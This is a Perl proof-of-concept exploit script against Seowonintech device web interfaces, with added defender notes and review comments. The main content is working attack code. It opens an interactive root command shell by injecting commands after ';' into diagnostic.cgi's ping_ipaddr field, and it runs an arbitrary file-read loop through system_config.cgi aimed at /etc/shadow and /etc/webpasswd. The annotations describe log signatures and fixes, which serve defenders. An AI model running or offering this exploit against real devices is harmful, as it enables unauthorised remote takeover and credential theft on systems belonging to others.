#!/usr/bin/perl
use LWP::Simple qw/ $ua get/;
# Top-level driver of a proof-of-concept against two CGI endpoints on the
# target's web management interface:
#   /cgi-bin/diagnostic.cgi    - ping form, used by rce() for command injection
#   /cgi-bin/system_config.cgi - config loader, used by rfd() for file reads
#
# Defender notes (derived from the requests this script builds):
#   * All traffic is plain HTTP GET. The script sets no credentials, cookies
#     or custom headers, so the default LWP User-Agent is presumably sent.
#   * Log signatures: diagnostic.cgi with a ping_ipaddr value containing ';',
#     and system_config.cgi with file_name=<absolute path>&btn_type=load.
#   * Mitigation: keep the management interface off untrusted networks and
#     apply vendor firmware if a fixed release exists. The underlying flaw is
#     missing server-side validation of ping_ipaddr and file_name.

# Normalise the first argument into a base URL, adding http:// when absent.
my $host = $ARGV [0] =~ /^http:\/\// ? $ARGV [0]: 'http://' . $ARGV [0];
# The usage check runs after $host has already been derived from $ARGV[0].
if (not defined $ARGV [0])
{
usg();
exit ;
}
print "[+] Seowonintech all device remote root exploit\n" ;
$diagcheck = $host . "/cgi-bin/diagnostic.cgi" ;
$syscheck = $host . "/cgi-bin/system_config.cgi" ;
# Probe 1: fetch the diagnostic page with the LWP::Simple user agent object.
# NOTE(review): LWP::UserAgent::get normally returns a response object even
# on failure, so the `|| die` is presumably never taken - confirm.
$res = $ua ->get( $diagcheck ) || die "[-] Error: $!\n" ;
print "[+] Checking before attack..\n" ;
# status_line is a string such as "200 OK"; != compares its numeric prefix.
if ( $res ->status_line != 200){
# A non-200 answer is only reported; execution falls through to probe 2.
print "[+] diagnostic.cgi Status: " . $res ->status_line. "\n" ;
} else {
print "[o] Victim is ready for attack.\n" ;
print "[o] Status: " . $res ->status_line. "\n" ;
# NOTE(review): this condition does not look like a reliable fingerprint of
# the page content. Treat the "ready"/"connected" output as unverified; the
# script appears to proceed against any host answering 200 on this path.
if ( defined $res =~ m{selected>4</option>}sx){
print "[+] Connected to $ARGV[0]\n" ;
print "[+] The fight for the future Begins\n" ;
print "[+] Exploiting via remote command execution..\n" ;
print "[+] Permission granted, old friend.\n" ;
# rce() loops until the operator quits or a request fails; it does not return.
&rce;
} else {
print "[!] Warning: possible vulnerability.\n" ;
exit ;
}
}
# Probe 2: reached only when diagnostic.cgi did not answer 200.
$res1 = $ua ->get( $syscheck ) || die "[-] Error: $!\n" ;
if ( $res1 ->status_line != 200){
print "[+] system_config.cgi Status: " . $res1 ->status_line. "\n" ;
exit ;
} else {
print "[+] Trying to attack via remote file disclosure release.\n" ;
# NOTE(review): the substitution runs on $syscheck (the URL string), not on
# the fetched page, so this is not a content check of the response - confirm.
if ( defined $syscheck =~ s/value=\'\/etc\/\'//gs){
print "[+] Victim is ready for attack.\n" ;
print "[+] Connected to $ARGV[0]\n" ;
print "[o] Follow the white cat.\n" ;
print "[+] Exploiting via remote file dislocure..\n" ;
print "[+] You feeling lucky, Neo?\n" ;
# rfd() loops until a request fails; it does not return.
&rfd;
} else {
print "[!] Warning: Possible vulnerability. Believe the unbelievable!\n" ;
exit ;
}
}
# rfd: interactive loop that reads a path from STDIN and requests it through
# system_config.cgi, printing the contents of the returned <textarea>.
# Takes no arguments and uses the globals $host, $file, $bug and $data.
# Never returns; the only exit here is the die on a failed or empty fetch.
#
# Defender notes: each iteration is one GET of
#   /cgi-bin/system_config.cgi?file_name=<path>&btn_type=load&action=APPLY
# with the path sent exactly as typed (no URL encoding). file_name values
# that point outside the expected configuration directory are the indicator
# to alert on. The device-side fix is to restrict file_name to an allow-list
# and to require an authenticated session for this handler.
sub rfd{
while (1){
print "# cat " ;
chomp ( $file =<STDIN>);
# An empty line only prints a hint; the request below is still sent.
if ( $file eq "" ){ print "Enter full path to file!\n" ; }
$bug = $host . "/cgi-bin/system_config.cgi?file_name=" . $file . "&btn_type=load&action=APPLY" ;
# LWP::Simple::get returns the body, or undef on failure.
$data =get( $bug ) || die "[-] Error: $ARGV[0] $!\n" ;
# The page apparently answers "Null" for a missing file; make that readable.
$data =~ s/Null/File not found!/gs;
# /x makes the spaces in the pattern insignificant, so it matches rows="30">.
# NOTE(review): confirm this condition really depends on the match succeeding
# before trusting the printed $1.
if ( defined $data =~ m{rows= "30" >(.*?)</textarea>}sx){
print $1 . "\n" ;
}
}
}
# rce: interactive loop that reads a line from STDIN and sends it inside the
# ping_ipaddr parameter of diagnostic.cgi, then prints part of the response.
# Takes no arguments and uses the globals $host, $rce, $bug, $data, $result.
# Leaves only through `exit` ("exit"/"quit") or the die on a failed fetch.
#
# Defender notes: each iteration is one GET of
#   /cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=...&ping_count=1
#       &action=Apply&html_view=ping
# where ping_ipaddr carries "-q -s 0 127.0.0.1;" followed by operator text.
# A ping_ipaddr value containing ';' or anything other than a host/address is
# the signature to detect and block. The CGI apparently passes this field to
# a shell; the fix is strict server-side validation of the address and
# invoking ping without a shell.
sub rce{
while (1){
print "# " ;
chomp ( $rce =<STDIN>);
# The operator's text is concatenated into the query string without encoding.
$bug = $host . "/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;" . $rce . ";&ping_count=1&action=Apply&html_view=ping" ;
# Replace the first '|' in the operator's input with ';'.
$rce =~ s/\|/\;/;
# The branches below act locally; except for exit/quit, the request is still sent.
if ( $rce eq "" ){ print "enter Linux command\n" ;}
# Clears the operator's own terminal using a fixed local command.
if ( $rce eq "clear" ){ system $^O eq 'MSWin32' ? 'cls' : 'clear' ;}
if ( $rce eq "exit" || $rce eq "quit" ){ print "There is no spoon...\n" ; exit ;}
# LWP::Simple::get returns the body, or undef on failure.
$data =get( $bug ) || die "[-] Error: $!\n" ;
# /x drops the space in the pattern: capture everything up to "Content-type:".
if ( defined $data =~ m{(\s.*) Content-type:}sx){
# Keep the capture from the ' loss' marker of the ping summary onward.
# `or` binds more loosely than `=`, so the second substr is never assigned.
$result = substr $1 , index ( $1 , ' loss' ) or substr $1 , index ( $1 , ' ms' );
# Strip the trailing ping-summary fragments so only the later output remains.
$result =~ s/ loss\n//;
$result =~ s/ ms\n//;
print $result ;
}
}
}
# usg: print the banner, author credit and usage examples to STDOUT.
# Takes no arguments and makes no network requests. $0 interpolates the
# script name into the usage lines.
sub usg
{
print " [+] Seowonintech all device remote root exploit\n" ;
print " [!] by Todor Donev todor dot donev @ googlemail.com\n" ;
print " [?] usg: perl $0 <victim>\n" ;
print " [?] exmp xpl USG: perl $0 192.168.1.1 :)\n" ;
print " [1] exmp xpl RCE: # uname -a :)\n" ;
# The paths named in the next line are what the file-read loop is aimed at;
# on an affected device, treat the credentials stored there as exposed.
print " [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd :P\n" ;
}